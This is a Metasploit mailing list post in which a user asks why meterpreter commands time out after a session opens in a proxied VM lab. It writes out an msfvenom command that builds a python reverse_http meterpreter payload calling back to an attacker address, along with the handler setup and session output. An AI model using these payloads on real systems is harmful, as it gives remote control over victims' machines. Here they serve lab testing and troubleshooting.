Metasploit mailing list archives
python/meterpreter/reverse_http timeout
From: "Mike Jones!" <property.of.mike.jones () gmail com>
Date: Mon, 2 Mar 2015 12:35:01 -0800
I'm testing payloads through a proxy in my VMs and can't get any meterpreter commands to work after the session opens. All VMs are running Debian. Victim: 10.17.24.128 Proxy: 10.17.24.10 and 172.16.22.10 (running Squid) Attacker: 172.16.22.22 I've generated a payload with msfvenom: msfvenom -p python/meterpreter/reverse_http LHOST=172.16.22.22 LPORT=8080 PROXYHOST=10.17.24.10 PROXYPORT=3128 Set up a handler: msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD python/meterpreter/reverse_http PAYLOAD => python/meterpreter/reverse_http msf exploit(handler) > set LHOST 172.16.22.22 LHOST => 172.16.22.22 msf exploit(handler) > set LPORT 8080 LPORT => 8080 msf exploit(handler) > exploit -j Executing the payload on the victim looks fine. Session hits on metasploit, and I can interact with it but none of the commands respond: msf exploit(handler) > [*] 172.16.22.10:52399 Request received for /x5LW... [*] Meterpreter session 1 opened (172.16.22.22:8080 -> 172.16.22.10:52399) at 2015-03-02 14:12:10 -0600 sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter python/python 172.16.22.22:8080 -> 172.16.22.10:52399 (172.16.22.10) msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > ps [-] Error running command ps: Rex::TimeoutError Operation timed out. I tried setting up the handler with and without PROXYHOST and PROXYPORT, neither way worked, though I suspect without those values is the correct approach. What am I missing? Thanks in advance.
_______________________________________________ https://dev.metasploit.com/mailman/listinfo/framework
Current thread:
- python/meterpreter/reverse_http timeout Mike Jones! (Mar 02)